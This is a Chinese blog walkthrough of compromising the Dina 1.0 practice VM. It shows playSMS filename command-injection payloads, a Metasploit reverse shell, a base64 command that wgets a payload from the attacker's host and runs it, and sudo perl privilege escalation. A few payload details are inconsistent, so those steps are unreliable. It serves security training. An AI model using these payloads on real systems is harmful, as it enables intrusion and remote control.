6.26.1 命令注入靶场

最新推荐文章于 2024-09-05 23:37:49 发布
最新推荐文章于 2024-09-05 23:37:49 发布
阅读量150 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ailkli/article/details/131389818
版权

 

目录

 靶场导入

尝试是否能通信

扫描开放的端口

扫描目录 

 对敏感目录进行访问

用收集信息进行登陆后台

搜索sms框架漏洞

根据42003文件翻译信息进行操作

设置反弹shell监听

进行提权操作:

 (4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客

(4条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客 

 

 靶场导入

右键使用vm打开导入

弹出导入失败 ,直接点重试

靶场地址3.137  3.141  3.148

kali地址 192.168.3.117

尝试是否能通信

 

扫描开放的端口

nmap -sV 192.168.3.137

扫描目录 

 nikto -host http://192.168.3.137

 

 

 对敏感目录进行访问

http://192.168.3.137/tmp/

说明开启了apache

 

点击进入 

 

 

http://192.168.3.148/wp-config.php

 

 http://192.168.3.137/uploads/

 http://192.168.3.148/robots.txt

http://192.168.3.148/nothing/

 

 view-source:http://192.168.3.148/nothing/

 

http://192.168.3.137/secure/

 下载.zip

 

 联想之前的密码freedom尝试后成功解压

发现打不开mp3打开属性  发现不是真mp3文件,用记事本打开 

 

 

用收集信息进行登陆后台

http://192.168.3.148/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login

 

尝试nothing网页得到的密码:diana 成功登陆

 

(4条消息) PlaySMS_战神/calmness的博客-CSDN博客

网页是playSMS框架  可以到kali利用searchsploit搜索信息

搜索sms框架漏洞

searchsploit playSMS 

 

searchsploit -p 42003.txt

 

cat /usr/share/exploitdb/exploits/php/webapps/42003.txt

 翻译信息:

(4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客

在本地创建1.csv文件(空文件只要是.csv后缀)

 

 

返回playsms网页

选择文件上传

 

 

 

在sms网页上传1.csv文件 

 

打开代理,进行抓包

根据42003文件翻译信息进行操作

将1.csv改成<?php system('uname -a'); die();?>.php

 

 进行放包

 

重新再上传抓包 发送给repeater  命令改为id

<?php system('id'); die();?>.phpid

 进行放包

 当前用户id和组id是33

以上操作说明filename存在代码执行和代码注入

设置反弹shell监听

msfconsole   

 

use exploit/multi/handler

 

set payload linux/x86/meterpreter/reverse_tcp

打开另一个终端查看地址

 

set lhost 192.168.3.117

 

set lport 4444

run

 

 

打开另一个终端

msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.3.137 lport=4444 -f elf > /var/www/html/shell

 

 

绕过防火墙

 

 

在浏览器进行抓3次放3次绕过防火墙的bash64的包 

本地返回playsms页面上传文件抓包

burp在filename处放

<?php system(base64_encode('放置base64代码')); dia();?>.php

1.

<?php system(base64_encode('d2dldCBodHRwOi8vMTkyLjE2OC4zLjExNy9zaGVsbCAtTyAvdG1wL2EK
')); die();?>.php

 

 进行放包

2.

<?php system(base64_encode('Y2htb2QgNzc3IC90bXAvYQo=
')); die();?>.php

进行放包:

 

 

3.

<?php system(base64_encode('L3RtcC9hCg==
')); die();?>.php

进行放包

 

进行提权操作:

Kali利用msf入侵Windows电脑(最详细包会) - 元宇宙-Metaverse - 博客园 (cnblogs.com) 

(5条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客

(5条消息) 靶机实战-Dina 1.0_dina 靶机实验_滕财然的博客-CSDN博客 

 

(5条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客

进行下面的操作  其实上面的放3次包监听过程可忽略,进行如下操作即可 

输入以下命令

 shell

ls
sudo perl -e "exec '/bin/sh' "
bash -i
cd /root

ls
cat flag.txt

(4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客

 

ailkli
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF命令注入Dina 1.0)
afei001
04-01 570
练习环境     攻击机:kali     靶机:Ubuntu 12.04(Dina 1.0) 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255....
Netflix-6.26.1.apk
06-30
Netflix 6.26.1
HWSensors.6.26.1440.Binaries.dmg
05-07
cpu等 HW监控 MAC
HWSensors 6.26.1440 Binaries.dmg
08-22
HWSensors 6.26.1440 Binaries黑苹果硬件状态监控插件
Bandizip v6.26.zip
10-22
《Bandizip v6.26:高效便捷的压缩与解压工具》 Bandizip是一款备受用户喜爱的压缩和解压软件,尤其在版本v6.26中,它进一步提升了性能和用户体验,成为了信息压缩领域的一款利器。本文将详细介绍Bandizip v6.26的...
HWSensors 6.26.1440的kexts
08-22
在提供的压缩包中,包含的是HWSensors 6.26.1440版本的五种内核扩展(kexts),而不是通常的.dmg安装包格式。 内核扩展(Kernel Extensions,简称kexts)是macOS操作系统中用于扩展内核功能的二进制文件。它们是...
PHP高效进销存管理系统智能管理库存销售与采购系统小程序源码
2401_84413795的博客
09-02 506
在这个快速发展的时代,企业要想在激烈的市场竞争中脱颖而出,就必须不断提升自身的运营效率和管理水平。高效进销存管理系统正是你实现这一目标的有力武器。它以其智能、高效、便捷的特点,帮助你轻松驾驭库存、销售与采购三大环节,引领你的企业迈向更加辉煌的未来!
DZ主题模板 Discuz迪恩淘宝客购物风格商业版模板
2403_86698467的博客
09-02 511
包括网站首页,论坛首页,论坛列表页,论坛内容页,论坛瀑布流,频道列表页,频道内容页(支持多个)。方便新手老手运营以及后期维护,时尚大气简洁。模板添加了不少处动画效果,增加用户体验和粘度。版本支持:discuzx3.0版本,discuzx3.1版本,discuzx3.2版本。模板有很多细节都有体现,同时对官方模板文件结构和功能位置做了更为优化的设计处理,模板论坛首页,列表页,内容页,以及文章页面数据采用DIY数据读取,Discuz淘宝客网站模板,迪恩淘宝客购物风格商业版模板。
python反序列化
2301_79783285的博客
08-30 1357
pickle序列化:将 Python 对象转换为可以存储或传输的格式。反序列化:将序列化的数据转换回 Python 对象。pickle模块:支持复杂的 Python 对象,但存在安全风险。json模块:支持 JSON 格式,更安全,适用于大多数应用场景。安全性:处理不受信任的数据时,应避免使用pickle。r:只读模式。w:写入模式,会清空原有内容。a:追加模式。b:二进制模式。:读写模式。x:独占创建模式。t:文本模式(默认)。
后端输出二进制数据,前端fetch接受二进制数据,并转化为字符输出
cdcdhj的博客
09-01 565
在这个前端代码中,我们使用fetch API请求PHP脚本,并获取二进制数据。然后,我们将ArrayBuffer转换为字符串,以便在JavaScript中使用。在PHP中,你可以将字符串或其他数据类型转换为二进制数据,并通过HTTP响应发送给前端。
如何优化浏览器缓存
web_geek的博客
09-04 1037
不过您使用的是WordPress,就省事很多,有许多出色的 WordPress 插件可以帮助您设置,大多数好的主机公司也会提供设置合理的默认值,比如Hostease的虚拟主机,在默认设置的基础上,您还可以联系技术支持为您做调整,所以说,选择一个可靠的主机商,对于网站建设来说也是非常重要的。每当用户访问您的网站,他他们的浏览器需要从服务器上下载页面显示所需的资源(图片、CSS、JavaScript 和字体等),这些资源的下载会占用带宽,并需要一定的传输时间。这是一个新文件,因此不存在提供过时文件的风险。
JAVA—网络通信
Hismybestlove的博客
09-05 899
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
域名解析DNS服务
qq_59349464的博客
09-01 1561
DNS 是互联网上解决网络中机器命名的一种系统。在网络中,一台主机去访问另外一台主机时,必须要 知道目标主机的IP地址,虽然网络上的节点都可以用IP地址来标识,并且可以通过IP地址被访问。但对 于自然人而言,一组组由数字组成的IP地址,是难以被理解和记忆的。于是设计出了域名系统,用一组 有意义的字符来表示某个特定主机或某个网络,再将网络中主机IP地址和域名之间做成一个映射表。
RTX5源码全家桶集成emWin6.40, Modbus主从,含FreeRTOS版, 探讨一种移植第3方组件通用方法以及使用注意事项2024-08-30
Simon223的博客
08-31 595
RTX5源码全家桶集成emWin6.40, Modbus主从,含FreeRTOS版, 探讨一种移植第3方组件的通用方法以及多任务使用注意事项。2、RTX5/FreeRTOS全家桶首期视频,框架设计。3、CMSSIS-RTOS V2封装层教程。6、emWin和全家桶中间件的兼容问题。
中间件解析漏洞
m0_73771249的博客
09-05 480
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏。
kali——nikto的使用
bunengyongzho666的博客
09-01 1260
linux自带的nikto工具能够对Web服务器进行综合性的安全测试,识别出潜在的安全问题和WEB漏洞。Kali Linux默认安装的nikto工具可以通过各种参数进行web服务器扫描,包括指定端口、目录、插件管理等,并且支持HTTPS、代理扫描以及与Nmap集成,为渗透测试人员提供了广泛的使用场景。
wordpress发送邮件的方法?怎么配置功能?
danplus的博客
09-04 654
通过上述步骤,你应该已经掌握了如何在WordPress中发送邮件的方法和配置功能。AokSend,WordPress邮件发送新选择,API与SMTP接口融合,提升网站通讯效率,让邮件营销更出色!
Linux系统性能调优技巧
最新发布
A_aspectJ的博客
09-05 969
Linux系统因其稳定性和灵活性广泛应用于服务器、开发环境和企业级应用中。然而,为了确保最佳性能,尤其是在负载较高的情况下,系统调优变得至关重要。Linux系统性能调优技巧主要包括硬件优化、软件优化、内核参数优化、进程管理优化等方面。
bandizip6.26
09-09
Bandizip 6.26 是一款免费的压缩和解压缩工具。它支持多种压缩文件格式,包括常见的ZIP、RAR、7Z等。Bandizip6.26还具有快速压缩和解压缩速度以及强大的加密功能,可以保护您的文件。它还提供了简洁易用的界面和丰富...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值